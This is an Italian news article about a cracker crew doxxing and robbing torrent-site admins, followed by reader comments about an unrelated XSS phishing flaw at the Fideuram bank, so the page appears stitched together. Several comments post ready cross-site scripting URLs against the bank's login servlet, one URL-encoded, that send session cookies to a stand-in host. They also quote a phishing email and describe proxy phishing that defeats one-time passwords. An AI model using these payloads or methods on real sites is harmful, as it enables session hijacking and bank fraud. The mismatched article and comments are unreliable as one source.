Cracker vogliono fare a pezzi il P2P

Una delle crew che animano il sottobosco telematico delle release pirata vuole danneggiare in maniera permanente certi siti di torrent. Compromessi i dati personali di due sysadimin

Roma – Attacchi rivolti a due diversi responsabili di siti di torrent portano la stessa firma, quella della cracker crew “cellkill”: il suo obiettivo parrebbe la vendetta nei confronti di quegli operatori del P2P che “rovinano la scena” distribuendo al pubblico archivi di crack, programmi e informazioni che dovrebbero rimanere riservati. Ne dà conto TorrentFreak , che in due diverse occasioni porta alla ribalta le scorribande dei cracker e le relative risposte dei sysadmin interessati.

Nel primo caso, i membri della crew sono riusciti a mettere le mani sulla password usata dall’amministratore di SuperTorrents conosciuto come Ersan , che è stato incauto al punto da usare la stessa chiave d’accesso segreta per un numero non precisato di siti . I cracker si sono impossessati della suddetta password, e come risultato l’account PayPal impiegato per le donazioni al sito è stato svaligiato dei 2000 dollari che conteneva, donati poi a un portale dedicato ad una religione alla quale Ersan aveva rivolto commenti offensivi.

Non bastasse, di Ersan ora i cracker conoscono il nome, l’indirizzo di residenza, l’età e persino l’automobile che guida abitualmente. È finito nelle loro mani anche l’account Gmail dell’admin. Quello che si direbbe un bel guaio insomma, ma la risposta di Ersan tende a ridimensionare l’accaduto e a rettificare le presunte informazioni riservate carpite dai tipi di cellkill.

I soldi sono effettivamente andati, dice Ersan, ma a parte questo danno – della durata di pochi giorni – il resto è salvo, account Gmail incluso. I cracker, però, non si danno per vinti, continuano a cantare vittoria e si rendono protagonisti, pochi giorni dopo, di un nuovo attacco, condotto questa volta ai danni del sysop del sito di torrent noto come FTN.

Per l’occasione, il file informativo distribuito in rete da cellkill parla chiaramente della volontà di “distruggere i sistemi di P2P, un passo alla volta”: i dati della vittima tanto per cambiare sono stati pubblicati. La motivazione è sempre la stessa: i siti di torrent e file sharing in generale sottraggono impunemente le “release” alle crew come cellkill, minacciando la loro sicurezza e rubando lavori di codice che non sarebbero pensati per essere goduti da una platea più ampia del solo underground cracker.

Pirati contro pirati , si potrebbe insomma sintetizzare, considerando che in genere il materiale proveniente dal suddetto underground è composto da software sprotetto, crack e via di questo passo.

Anche nel caso dell’operatore di FTN, ad ogni modo, pare che i danni siano molto più contenuti di quanto la propaganda della crew lasci intendere : Brandon – vero nome del sysop in oggetto – gongola e accusa la crew di patente stupidità, copia e incolla di dati disponibili su Facebook e diffusione di informazioni non necessariamente vere sul proprio conto. Almeno, chiosa infine Brandon, grazie all’azione di disturbo di cellkill, FTN ha raggiunto un’inaspettata notorietà.

Alfonso Maruccia

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • sergio sosso scrive:
    Fideuram login
    Fino a 3 giorni fa digitando su Google "BANCAFIDEURAM LOGIN" mi compariva la schermata della banca, e mi potevo collegare.Come si può permettere che adesso invece, sempre chiedendo BANCAFIFEURAM compaia una pletora di siti ingannevoli che nulla hanno a che fare con la banca?Siccome alcuni sono italiani, non è possibile far intervenire la Polizia POstale per farli chiudere, o quantomeno isolare dalla Banca con la quale non hanno nulla a che spartire?grazie
  • gyggedy scrive:
    phishing su liberomail nessuno fa nulla
    continuo a ricevere il messaggio qui sottofate attenzionea proposito, evitate di registrarvi..il sito di PS non permette ulteriori segnalazioni in merito, come sempre il problema è sottovalutato e tollerato: ok, bisogna essere particolarmente deficienti per "confermare"le proprie coordinate su qualsiasi sito, ma non si sa mai.il mondo è pieno di imbecilli. REF# 5102 Informazioni importanti relative al tuo accountGentile ..@libero.it, Il Servizio Tecnico di Banca Fideuram sta eseguendo un aggiornamento programmato del software al fine di migliorare la qualita dei servizi bancari.Le chiediamo di avviare la procedura di conferma dei dati del Cliente. A questo scopo, La preghiamo di cliccare sul link che Lei trovera alla fine di questo messagio. Rispondi
  • alx scrive:
    Vulnerabilità corretta
    La vulnerabilità risulta corretta.
    • Gabriele scrive:
      Re: Vulnerabilità corretta
      - Scritto da: alx
      La vulnerabilità risulta corretta.Appare un laconico "AVVISO - errore generico - chiudi", speriamo sia davvero corretta, non solo mascherata.G.
    • T.A. scrive:
      Re: Vulnerabilità corretta

      La vulnerabilità risulta corretta.... potere della stampa ...
      • rotfl scrive:
        Re: Vulnerabilità corretta
        - Scritto da: T.A.

        La vulnerabilità risulta corretta.

        ... potere della stampa ...In Italia una cosa non esiste finche' non ne parla la stampa... che squallore...
        • franbasil scrive:
          Re: Vulnerabilità corretta
          non sono un esperto di informatica, ma non sarei cosí certo che il problema sia stato risolto.da circa un mese ricevo sulla mia casella di posta un messaggio alla settimana da un sedicente "servizio tecnico" della Fideuram che mi invita a cliccare su un link per "aggiornare il software bancario" (??).il fatto per me allarmante é che non riesco a capire come tale "servizio tecnico" abbia avuto il mio indirizzo e-mail dato che vivo da cinque anni all'estero, non sono mai stato correntista della Fideuram e l'unica cosa che ho lasciato attiva in Italia é la casella di posta che tra l'altro utilizzo molto raramente.é vero peró che, tramite home-banking, effettuo dall'estero periodicamente e regolarmente bonifici sul conto di mio fratello che per l'appunto é un conto Fideuram.francamente non so se posso ancora fidarmi o é preferibile effettuare i bonifici tramite sportello...
          • Davide M scrive:
            Re: Vulnerabilità corretta
            C'è stato un periodo che a me arrivavano costantemente messaggi da parte di Bancoposta, Capitalia, Unicredit che mi avvisavano di aggiornare o il software o i codici o altro e io non sono mai stato correntista di nessuna di queste banche.A quanto ne so io non c'è bisogno di essere correntista o di essere stato correntista di una banca per questa gente per inviare le mail, ma gli indirizzi sono "catturati" nella rete in altri modi.In quanto alla sicurezza al di la del fatto che questi istituti dovrebbero fare di più per garantire maggior sicurezza, alcuni di questi (e Fideuram lo fa) permettono di abilitare un avviso automatico tramite SMS ogni qual volta viene disposto un ordine che comporta trasferimento di denaro.
  • Marcello Romani scrive:
    Url del sito contraffatto "not found"
    L'url del sito taiwanese:ht tp://s un.c omal l.tw/sc ript/Log inServ let.php?funct ion=log innon è raggiungibile (9/1/2008 ore 20:30 circa)
    • Burp scrive:
      Re: Url del sito contraffatto "not found"
      Il sito c'e' sempre, la pagina incriminata non c'e' piu'.Notare che Firefox addirittura la segnala automaticamente come "suspected web forgery" quando si tenta di accedere a tale url. Quindi dev'essere proprio roba vecchietta.http://sun.comall.tw/script/LoginServlet.php?function=login
  • anonimo scrive:
    grammatica italiana
    fin ora senza apostrofo . grazie
  • ba1782 scrive:
    FINALMENTE!
    Ok almeno non mi arriva più niente da Fideuram... Mancano San Paolo e Poste... ANDATE COSì!!!! :DNon ce la faccio più, il mio lavoro è diventato troppo stressante!!SalutiLa cartella di Spam di ba1782
  • Jason scrive:
    Una piccola soluzione
    Altre banche prevedono l'inserimento del codice cliente e della data di nascita. Date queste informazioni, la banca risponde con nome e cognome dell'intestatario del conto e solo in quel momento è possibile digitare la password per entrare nel conto corrente.In questo modo, prima di immettere la password la banca deve sempre fornire il nome dell'intestatario del conto. Se non lo fa, quello non è il sito vero della banca.In aggiunta, per qualsiasi movimento di denaro si può usare una di quelle chiavette elettroniche che generano una ulteriore password diversa ogni minuto utilizabile solo per quella singola operazione.Con due sistemi del genere forse non si esclude completamente il phishing, ma lo si argina di molto.(non sono idee mie, ci sono banche che da tempo utilizzano simili sistemi di sicurezza)
    • diegoitaliait scrive:
      Re: Una piccola soluzione
      Mi sembrano delle ottime soluzioni.La mia banca "Intesa", mi permette di utilizzare in modalità Lettura il conto con la mia password e login, ma nel momento in cui devo fare delle operazioni devo utilizzare delle chiavi datemi da loro, e quando le utilizzo tutte, devo tornare in banca per averne delle altre, ammetto che è palloso ma visto i tempi che corrono mi sembra un'ottima idea.Dopo tutto meglio perdere mezza giornata, che tutto il conto
      • Gabriele scrive:
        Re: Una piccola soluzione
        - Scritto da: diegoitaliait
        Mi sembrano delle ottime soluzioni.

        La mia banca "Intesa", mi permette di utilizzare
        in modalità Lettura il conto con la mia password
        e login, ma nel momento in cui devo fare delle
        operazioni devo utilizzare delle chiavi datemi da
        loro, e quando le utilizzo tutte, devo tornare in
        banca per averne delle altre, ammetto che è
        palloso ma visto i tempi che corrono mi sembra
        un'ottima
        idea.
        Secondo me invece non è normale dover fare tutti sti giri per operare sul proprio conto.Dovrebbero mettere una clausola anti-utonto: "se ti svuotano il conto perché sei poco furbo e clicchi a caso, non vieni rimborsato".Ovviamente solo se la banca dimostra che non è stata raggirata tecnicamente, non ha falle e ha fatto tutto il possibile per avvertire il cliente di potenziali rischi ed escludendo il furto fisico dei codici (tipo se ti rubano materialmente carta di credito o i ladri ti svaligiano la casa portandosi via le carte della banca).Invece le banche hanno deciso di rendere la vita complicata a tutti i clienti per colpa di qualcuno.D'altra parte, se il phishing Poste è quello più gettonato, un motivo ci sarà...G.
        • Lillo scrive:
          Re: Una piccola soluzione
          Si vabbè e nel paese dei balocchi tutti quelli che dimostrano di essere stati bravi meritano un biscotto. :)Le tecniche di protezione e di uso di servizi online sono ormai note e collaudate e tra queste ci sono sia il mostrare dati dell'utente come nome e cognome per dimostrare che li si possiede ed il sito in cui si sta collegando è quello giusto, sia il carnet di operazioni a scadenza che hai solo tu. In questo modo il phisher può rubarti solo un codice operazione.Poi ci sono gli SMS spediti dalla banca dopo operazioni oltre una certa cifra. Ma ci sono banche che per risparmiare quei micragnosi 10cent a volte te lo manda a volte no, a volte ti toglie dal servizio notifica perché fai tante operazioni e gli costa troppo notificartele tutte e sempre. Fa così Unicredit per esempio.
          • Shift scrive:
            Re: Una piccola soluzione
            Mediolanum ti invia un sms per -qualsiasi- operazione,compreso l'accesso alla banca online;tutti gli sms, anche quelli dopo un pos, sono praticamenteimmediati e non ha mai perso un colpo.
          • Lillo scrive:
            Re: Una piccola soluzione
            E Unicredit invece funziona a singhiozzo con molti utenti, non è solo una mia esperienza...
      • Francisco Navarro scrive:
        Re: Una piccola soluzione
        - Scritto da: diegoitaliait
        La mia banca "Intesa", mi permette di utilizzare
        in modalità Lettura il conto con la mia password
        e login, ma nel momento in cui devo fare delle
        operazioni devo utilizzare delle chiavi datemi da
        loro, e quando le utilizzo tutte, devo tornare in
        banca per averne delle altre, ammetto che è
        palloso ma visto i tempi che corrono mi sembra
        un'ottima
        idea.Idem per Unicredit, solo che esaurite le 40 "password dispositive", mandano una nuova "password card" direttamente a casa senza costi aggiuntivi (ok, mi hanno pagato per questa pubblicità :$ )
      • brabra scrive:
        Re: Una piccola soluzione
        La soluzione proposta delle one time password, come quella che chiede data di nascita e codice e poi fa vedere il nome, sono bucabili (con più difficoltà comunque) con un sito di pishing con una metodologia assimilabile ai "proxy".Tu fai tutte le operazioni di logon e autenticazione su di un "proxy" settato dal pisher, che in parallelo fa medesime operazioni anche sul sito reale, dandoti indietro le pagine del sito reale (quindi con il tuo nome, esattamente il tuo estratto conto ecc ecc), e nel momento in cui ti sei collegato e autenticato correttamente il server proxy smette di funzionare come proxy e prosegue dandoti pagine fasulle create secondo le operazioni che fai, mentre il server del pisher ora autenticato sul sito reale si fa tutti i bonifici che vuole dal tuo conto.
        • rotfl scrive:
          Re: Una piccola soluzione
          - Scritto da: brabra
          La soluzione proposta delle one time password,
          come quella che chiede data di nascita e codice e
          poi fa vedere il nome, sono bucabili (con più
          difficoltà comunque) con un sito di pishing con
          una metodologia assimilabile ai
          "proxy".
          Tu fai tutte le operazioni di logon e
          autenticazione su di un "proxy" settato dal
          pisher, che in parallelo fa medesime operazioni
          anche sul sito reale, dandoti indietro le pagine
          del sito reale (quindi con il tuo nome,
          esattamente il tuo estratto conto ecc ecc), e nel
          momento in cui ti sei collegato e autenticato
          correttamente il server proxy smette di
          funzionare come proxy e prosegue dandoti pagine
          fasulle create secondo le operazioni che fai,
          mentre il server del pisher ora autenticato sul
          sito reale si fa tutti i bonifici che vuole dal
          tuo
          contoEsattamente. Fra l'altro non c'e' neanche bisogno che "prosegua su pagine fasulle", dato che ormai ha gia' ottenuto i dati che voleva. Potrebbe a questo punto dare una pagina (finta) di errore e chi si e' visto si e' visto...
        • Naxalite scrive:
          Re: Una piccola soluzione
          - Scritto da: brabra
          La soluzione proposta delle one time password,
          come quella che chiede data di nascita e codice e
          poi fa vedere il nome, sono bucabili (con più
          difficoltà comunque) con un sito di pishing con
          una metodologia assimilabile ai
          "proxy".Un piccolo problema: se già la pagina iniziale di un sitodi home banking è in https (e non solo il POST delle credenziali), il metodo di proxying non puòfunzionare a meno di non fare MITM anche su SSL; in tal caso, però, dovresti passare al client un certificato fasullo che il browser non riconoscerebbe come firmato da una CAnota...
          • rotfl scrive:
            Re: Una piccola soluzione
            - Scritto da: Naxalite
            - Scritto da: brabra

            La soluzione proposta delle one time password,

            come quella che chiede data di nascita e codice
            e

            poi fa vedere il nome, sono bucabili (con più

            difficoltà comunque) con un sito di pishing con

            una metodologia assimilabile ai

            "proxy".

            Un piccolo problema: se già la pagina iniziale di
            un
            sito
            di home banking è in https (e non solo il POST
            delle credenziali), il metodo di proxying non
            può
            funzionare a meno di non fare MITM anche su SSL;
            in tal caso, però, dovresti passare al client un
            certificato fasullo che il browser non
            riconoscerebbe come firmato da una
            CA
            nota...Giusto, ma il discorso cade completamente con una pagina che fa fare html injection come quella di Fideuram, in quanto l'URL e' effettivamente quello della banca e quindi anche il certificato e' mostrato come valido; l'unica cosa "sospetta" e' che viene segnalato che la connessione sicura contiene alcuni elementi esterni che non sono "crittati" con SSL. Dato che questo succede anche su siti strafamosi (come Google o Blogger) dubito che possa inospettire tutti... anzi...
  • Mauro scrive:
    Chiarimento
    Ma se la pagina di login è quella visualizzata nell'immagine, allora credo che un occhio attento si accorga della truffa: in fase di login alla banca vera vengono chiesti solo due dati. Il Codice Operativo, invece, viene chiesto solo quando si effettuano operazioni.O ho capito male?Quanto alle condizioni di Fideuram, invece, ad oggi ancora non ho trovato una banca che ne faccia di migliori.Saluti.
    • Gabriele scrive:
      Re: Chiarimento
      - Scritto da: Mauro
      Ma se la pagina di login è quella visualizzata
      nell'immagine, allora credo che un occhio attento
      si accorga della truffa: in fase di login alla
      banca vera vengono chiesti solo due dati. Il
      Codice Operativo, invece, viene chiesto solo
      quando si effettuano
      operazioni.
      O ho capito male?Sì, è così ti vengono chiesti 3 dati nel phishing, ma l'url sfruttata mostra l'indirizzo della banca (non quello del form taiwanese, come indicato in figura) con tanto di SSL!Quindi l'utente poco accorto potrebbe semplicemente pensare che si tratti di una nuova procedura. In fin dei conti, lui vede in alto "https://www.fideuramonline.it/script/LoginServlet?function[falla iframe]....." e quindi se non ispezioni bene il sito non te ne accorgi.
      Quanto alle condizioni di Fideuram, invece, ad
      oggi ancora non ho trovato una banca che ne
      faccia di
      migliori.Ah beh allora lasciamo tutto così...G.
      • Mauro scrive:
        Re: Chiarimento
        - Scritto da: Gabriele
        - Scritto da: Mauro

        Ma se la pagina di login è quella visualizzata

        nell'immagine, allora credo che un occhio
        attento

        si accorga della truffa: in fase di login alla

        banca vera vengono chiesti solo due dati. Il

        Codice Operativo, invece, viene chiesto solo

        quando si effettuano

        operazioni.

        O ho capito male?

        Sì, è così ti vengono chiesti 3 dati nel
        phishing, ma l'url sfruttata mostra l'indirizzo
        della banca (non quello del form taiwanese, come
        indicato in figura) con tanto di
        SSL!
        Quindi l'utente poco accorto potrebbe
        semplicemente pensare che si tratti di una nuova
        procedura. In fin dei conti, lui vede in alto
        "https://www.fideuramonline.it/script/LoginServletNon solo. Al primo accesso, se non ricordo male, mi vennero chieste tutte e tre le informazioni. Ma è passato molto tempo ed i soldi sono ancora "tutti" là!!! Comunque questa è un'informazione utile: se non l'avessi avuta, sarei potuto cadere anche io nel trabocchetto.

        Quanto alle condizioni di Fideuram, invece, ad

        oggi ancora non ho trovato una banca che ne

        faccia di

        migliori.

        Ah beh allora lasciamo tutto così...No, non intendevo dire che questo problema non vada segnalato e risolto, al contrario.Dico, però, che da un punto di vista correntistico, la Fideuram offre oggettivamente condizioni vantaggiose. Tutto qui. Visto che leggevo sopra di "evitarli come lebbrosi", non ero d'accordo.
        • Lillo scrive:
          Re: Chiarimento
          Scusa ma se con questa banca sei a rischio frodi,il problema è stato segnalato da tempo e loro se la prendono comoda, non lo hanno ancora sistemato e ciò dimostra la loro scarsa serietà,a noi che ce ne può fregare di quanto buone siano le loro condizioni, con simili presupposti?
          • Roberto scrive:
            Re: Chiarimento
            - Scritto da: Lillo
            Scusa ma se con questa banca sei a rischio frodi,
            il problema è stato segnalato da tempo e loro se
            la prendono comoda,
            non lo hanno ancora sistemato e ciò dimostra la
            loro scarsa
            serietà,Su questo punto posso essere daccordo, DEVONO essere più accorti e sistemare il problema, ma non lo devono fare per tutti gli utenti, solo per gli utenti "fessacchiotti".Se un utente entra nella pagina digitando a mano l'indirizzo non corre nessun rischio e non ne correrà mai nessuno, e in tutti i siti di tutte le banche viene sempre ricordato che mai e poi mai si deve entrare nel proprio home banckig tramite link pervenuti via mail, va sempre digitato l'indirizzo a manina sul proprio browser, e in lampo si evitano tutti i problemi di phishing.
            a noi che ce ne può fregare di quanto buone siano
            le loro condizioni, con simili
            presupposti?io sono loro cliente da anni sia per il mio conto personale che per quello della mia ttività, e ti garantisco che il servizio è eccezionale e mi ha consentito di risparmiare tanti bei soldini.Poi ripeto, DEVONO sistemare il problema, ma io per la modalità in cui usufruisco del loro servizio non posso annoverarlo fra i meno ( - ) in una ipotetica valutazione.
          • Lillo scrive:
            Re: Chiarimento
            Ma quanti dipendenti di Fideuram ci siete dentro al forum a dire quanto è figa questa banca coi siti bucati che se ne frega degli tenti siano essi furbi o fessacchiotti???L'articolo non parlava di link che gli utenti stupidi digitano in posta elettronica, ma di html poisoning tramite iframe all'interno delle pagine dello stesso sito.
          • Mauro scrive:
            Re: Chiarimento
            - Scritto da: Lillo
            L'articolo non parlava di link che gli utenti
            stupidi digitano in posta elettronica, ma di html
            poisoning tramite iframe all'interno delle pagine
            dello stesso
            sito.Vabbè, lasciamo perdere il discorso su vantaggi o svantaggi di questa o quella banca. Quest'ultima tua affermazione è esattamente quello che avevo capito anche io. Infatti non mi spiegavo come mai si parlasse di phishing quando mi sembrava d'aver capito che si trattasse di un vero e proprio redirect!Ma se è un link che ti danno via e-mail...beh....allora non è questione di Fideuram, è proprio questione di utenti rimasti ancora all'anteguerra, se permettete.E' possibile chiedere alla redazione di PI se si tratta di un url inviato via e-mail, o di una molto più dannosa redirect?Thanks.
          • Roberto scrive:
            Re: Chiarimento
            Ovviamente non mi degno neanche di rispondere a chi sostiene che sono un dipendente di banca fideuram, come minimo lui è lo stesso che quando mi firmavo per intero rompeva dicendo che mi facevo pubblicità...Per quanto riguarda il problema io leggendo questo avevo capito si trattasse di vecchio phishing:"...questa vulnerabilità viene attivamente sfruttata dalla solita banda di phisher HELO User per inserire un iframe che punta al loro sito e permette..."e"...Non si tratta del "solito" phishing facilmente riconoscibile dalla URL utilizzata, perché questa volta viene effettivamente mostrato e caricato l'indirizzo della banca (con tanto di certificato SSL); però, tramite lo sfruttamento di..."In pratica solitamente ti mandano su un sito diverso mascherato da sito ufficiale, stavolta invece PASSANDO DEI PARAMETRI NELLA URL, fanno caricare al sito ufficiale le parti del loro sito mascherato, ma sempre di vecchio e arcinoto phishing si tratta.Almeno così ho capito io.
          • Mauro scrive:
            Re: Chiarimento
            - Scritto da: Roberto
            ...In pratica solitamente ti mandano su un sito
            diverso mascherato da sito ufficiale, stavolta
            invece PASSANDO DEI PARAMETRI NELLA URL, fanno
            caricare al sito ufficiale le parti del loro sito
            mascherato, ma sempre di vecchio e arcinoto
            phishing si
            tratta.Anche io ho capito che si tratta dello stesso sistema di sempre, solo molto meglio articolato. Anche perché ho letto: "Per fortuna la e-mail di phishing è grossolana nel linguaggio usato, mase fosse stata scritta più correttamente, sarebbe diventata il phishingbancario "migliore" tra tutti quelli che ho visto fin'ora".Significa che sempre un'e-mail che ti invita a cliccare su un link ti deve arrivare.Da come avevo capito all'inizio, invece, m'ero ben più preoccupato!!
          • rotfl scrive:
            Re: Chiarimento
            - Scritto da: Mauro
            se fosse stata scritta più correttamente, sarebbe
            diventata il
            phishing
            bancario "migliore" tra tutti quelli che ho visto
            fin'ora".
            Significa che sempre un'e-mail che ti invita a
            cliccare su un link ti deve
            arrivare.

            Da come avevo capito all'inizio, invece, m'ero
            ben più
            preoccupato!NON si tratta solo di phishing, ma di Cross Site Scripting, che e' MOLTO peggio.https://www.fideuramonline.it/script/LoginServlet?function=popup&msg=%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%63%6f%6d%2f%72%65%61%64%63%6f%6f%6b%69%65%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%65%73%63%61%70%65%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3c%2f%73%63%72%69%70%74%3e
          • Roberto scrive:
            Re: Chiarimento
            - Scritto da: rotfl
            NON si tratta solo di phishing, ma di Cross Site
            Scripting, che e' MOLTO
            peggio.

            https://www.fideuramonline.it/script/LoginServlet?ok, ma siamo daccordo che assolutamente nessun utente di nessuna banca dovrebbe (purtroppo il condizionale è d'obbligo visto la gente che gira) entrare sul sito della propria banca cliccando su link che trova in giro???Se uno si riscrive l'indirizzo della pagina ogni volta non rischia niente, con nessuna banca.Il problema è che la maggior parte degli utenti di pc oggi non sanno neanche dove vanno scritti gli indirizzi, la prima casellina che gli capita per loro è buona.
          • rotfl scrive:
            Re: Chiarimento
            - Scritto da: Roberto
            Il problema è che la maggior parte degli utenti
            di pc oggi non sanno neanche dove vanno scritti
            gli indirizzi, la prima casellina che gli capita
            per loro è
            buonaCome non quotarti... ho visto gente che non sapeva neanche digitare l'URL di un motore di ricerca o di un sito, scriveva cio' che voleva cercare o il sito (tipo, che so, corriere della sera) direttamente nella barra dell'URL. :(
          • Roberto scrive:
            Re: Chiarimento
            - Scritto da: rotfl
            Come non quotarti... ho visto gente che non
            sapeva neanche digitare l'URL di un motore di
            ricerca o di un sito, scriveva cio' che voleva
            cercare o il sito (tipo, che so, corriere della
            sera) direttamente nella barra dell'URL.
            :(Ma c'è anche gente che quando gli dico di inseire direttamente un indirizzo di un sito me lo vanno a scrivere dentro la casella di ricerca di google, e poi lo vanno a cliccare tra i risultati (che può anche esistere per i siti pubblici, ma vatti a trovare indicizzata la url del server di posta aziendale!!)ahhh, gli utonti, come sarebbe il mondo senza??
          • Gabriele scrive:
            Re: Chiarimento
            - Scritto da: Roberto[cut]
            Ma c'è anche gente che quando gli dico di inseire
            direttamente un indirizzo di un sito me lo vanno
            a scrivere dentro la casella di ricerca di
            google, e poi lo vanno a cliccare tra i risultati
            (che può anche esistere per i siti pubblici, ma
            vatti a trovare indicizzata la url del server di
            posta
            aziendale!!)

            ahhh, gli utonti, come sarebbe il mondo senza??Hai ragione, questa cosa la fanno in tanti ed è indice che non hanno capito cosa stanno facendo; a parte falsare i risultati nelle statistiche di ricerca, se per caso non vedono Google o Yahoo come home page, non sanno più che fare !E' grave, secondo me.E vuoi che sta gente poi non clicchi su un link, se vede scritto https://www.nomeverodellabanca.ext ? G.
          • TOMFOD scrive:
            Re: Chiarimento
            infatti da tempo anche explorer lo fa benissimo, se scrivi nella barra qualsiasi nome ti trova URL....forse meglio che ci provi prima di dare info azzardate
          • Lillo scrive:
            Re: Chiarimento
            Tu sei legato a banca Fideuram, perché hai subito premesso i mirabolanti vantaggi dell'azienda e minimizzato il problema in questione sviandolo verso tipologie di phishing più comune e diffuso.E questo non lo avrebbe fatto nessun cliente, neppure il più soddisfatto... Che invece starebbe leggendo attentamente e avrebbe cercato di capire di più se i suoi soldi sono a rischio.Quindi fai un favore a te stesso e a tutti, apri quel benedetto Lotus Notes e manda una mail ai colleghi del gruppo di sviluppo e digli che si sbrighino a sistemare il problema ché questa storia vi sta smerdando per bene. :)
          • Gabriele scrive:
            Re: Chiarimento
            - Scritto da: Roberto[cut]
            In pratica solitamente ti mandano su un sito
            diverso mascherato da sito ufficiale, stavolta
            invece PASSANDO DEI PARAMETRI NELLA URL, fanno
            caricare al sito ufficiale le parti del loro sito
            mascherato, ma sempre di vecchio e arcinoto
            phishing si
            tratta.Te lo rispiego:1) è phishing nel senso che sono arrivate delle e-mail (come ho specificato, per fortuna scritte in modo dubbio) sparate a destinatari a caso;2) Non ti accorgi del tranello in modo facile come nei phishing abituali perché il link contenuto è "genuino"! Devi leggere la spiegazione sul sito Spamhaus o CastleCops per capire bene.Ossia nella URL è scitto https e il certificato è quello della banca, perché effettivamente il browser è lì che va; ma dentro la stessa pagina appare un form il cui contenuto viene inviato ad un altro server (quello di Taiwan).Quindi se la e-mail truffaldina fosse scritta decentemente, potrebbe fare grossi danni.E faccio notare, come altri hanno scritto altrove, che il sistema usato può esser sfruttato per tante cose, tipo far scaricare qualcosa e roba simile.Gabriele
          • Roberto scrive:
            Re: Chiarimento
            - Scritto da: Gabriele
            Te lo rispiego:
            1) è phishing nel senso che sono arrivate delle
            e-mail (come ho specificato, per fortuna scritte
            in modo dubbio) sparate a destinatari a
            caso;
            2) Non ti accorgi del tranello in modo facile
            come nei phishing abituali perché il link
            contenuto è "genuino"! Devi leggere la
            spiegazi.....Lo avevo capito, e ti reincollo quello che ho scritto prima, e che ho letto nelle brochure quando ho aperto il conto, e che sicuramente tutti avrebbero dovuto leggere nelle brochure delle loro banche quando hanno aperto il conto:"..assolutamente nessun utente di nessuna banca dovrebbe (purtroppo il condizionale è d'obbligo visto la gente che gira) entrare sul sito della propria banca cliccando su link che trova in giro......Se uno si riscrive l'indirizzo della pagina ogni volta non rischia niente, con nessuna banca."Io capisco che il tranello sia ben confezionato, che stavolta l'url sia proprio vero, che sono dei gran bas...., ma il phishing può essere fermato alla fonte, non cliccando su nessun link nelle proprie e-mail, poi ripeto per l'ennesima volta, visto che è pieno così di gente che non ci capisce niente e vive per farsi fregare, bisogna che la banca velocemente e nel miglio modo possibile mettà un tappo a questo problema, ma solo per salvaguardare i suoi clienti polli, non tutti gli altri.:-)
    • Mauro scrive:
      Re: Chiarimento
      - Scritto da: Mauro
      Ma se la pagina di login è quella visualizzata
      nell'immagine, allora credo che un occhio attento
      si accorga della truffa: in fase di login alla
      banca vera vengono chiesti solo due dati. Il
      Codice Operativo, invece, viene chiesto solo
      quando si effettuano
      operazioni.Allora.Ho chiamato il Servizio Clienti di Fideuram. Mi è stato detto che i tecnici sono al lavoro, ma, cosa ben più importante, mi hanno confermato che i tre codici non vengono MAI chiesti contestualmente.Questo, al di là dei giudizi di merito, dovrebbe fare da cartina tornasole....almeno lo farà per me.Saluti.
    • Quell'altro scrive:
      Re: Chiarimento

      Quanto alle condizioni di Fideuram, invece, ad
      oggi ancora non ho trovato una banca che ne
      faccia di migliori.Parli di condizione economiche? Questo non lo so; però, per quanto riguarda la sicurezza informatica, ti segnalo che con BNL per attivare il servizio internet ti danno un token che genera one-time-passwords. Mi risulta che tra le grandi sia l'unica; è vero che altre banche hanno condizioni leggermente migliori, ma io sono rimasto a BNL proprio per qesto motivo.
      • Roberto scrive:
        Re: Chiarimento
        - Scritto da: Quell'altro
        Parli di condizione economiche? Questo non lo so;
        però, per quanto riguarda la sicurezza
        informatica, ti segnalo che con BNL per attivare
        il servizio internet ti danno un token che genera
        one-time-passwords. Mi risulta che tra le grandi
        sia l'unica; è vero che altre banche hanno
        condizioni leggermente migliori, ma io sono
        rimasto a BNL proprio per qesto
        motivo.mi è sembrato di vedere in giro i token di unicredit.Comunque anche le condizioni economiche e i servizi che puoi avere da una banca (e chi ci lavora) fanno la loro parte nella valutazione, poi dipende anche da cosa ci devi fare con il conto e quanto spesso hai bisogno dei servizi.Per me è una cosa quotidiana.
      • Mauro scrive:
        Re: Chiarimento
        Sì, parlavo delle condizioni di conto. Non ti danno interessi, ma hai prelevamenti bancomat su tutti gli sportelli gratuiti per tutto l'anno e, soprattutto, il costo annuale è una sciocchezza: poco più di 14 euro all'anno!Ad ogni modo, non volevo parlare della convenienza di una banca rispetto ad un'altra. Anche perché, a quanto mi risulta, entrare ora in Fideuram prevede un versamento di 50000 euro...cosa che EVIDENTEMENTE non esisteva quando aprii il mio conto!!!!Saluti a tutti.- Scritto da: Quell'altro

        Quanto alle condizioni di Fideuram, invece, ad

        oggi ancora non ho trovato una banca che ne

        faccia di migliori.

        Parli di condizione economiche? Questo non lo so;
        però, per quanto riguarda la sicurezza
        informatica, ti segnalo che con BNL per attivare
        il servizio internet ti danno un token che genera
        one-time-passwords. Mi risulta che tra le grandi
        sia l'unica; è vero che altre banche hanno
        condizioni leggermente migliori, ma io sono
        rimasto a BNL proprio per qesto
        motivo.
  • Giuseppe Rossi scrive:
    E' facile
    fare considerazioni su quanto sono esperti, alla larga da questa banca per qualsiasi operazione, vanno guardati come lebbrosi.
  • blah scrive:
    Non solo phishing
    Vorrei fare notare che peraltro questo XSS non si presta solo al phishing, in quanto se qualcuno e' gia' loggato non hanno bisogno neanche delle credenziali per "rubare" la sessione:https://www.fideuramonline.it/script/LoginServlet?function=popup&msg= document.location.href='http://www.evilsite.com/readcookie.php?read='%2Bescape(document.cookie) Non so (perche' non sono mai stato cliente di questa banca) se l'autenticazione sul sito e per le transazioni si basi solo sulla sessione, ma e' possibilissimo. Inoltre, ovviamente nel sito i cracker possono inserire iframe con exploit e malware a piacimento.
    • blah scrive:
      Re: Non solo phishing
      - Scritto da: blah
      Vorrei fare notare che peraltro questo XSS non si
      presta solo al phishing, in quanto se qualcuno e'
      gia' loggato non hanno bisogno neanche delle
      credenziali per "rubare" la
      sessione:

      https://www.fideuramonline.it/script/LoginServlet?

      Non so (perche' non sono mai stato cliente di
      questa banca) se l'autenticazione sul sito e per
      le transazioni si basi solo sulla sessione, ma e'
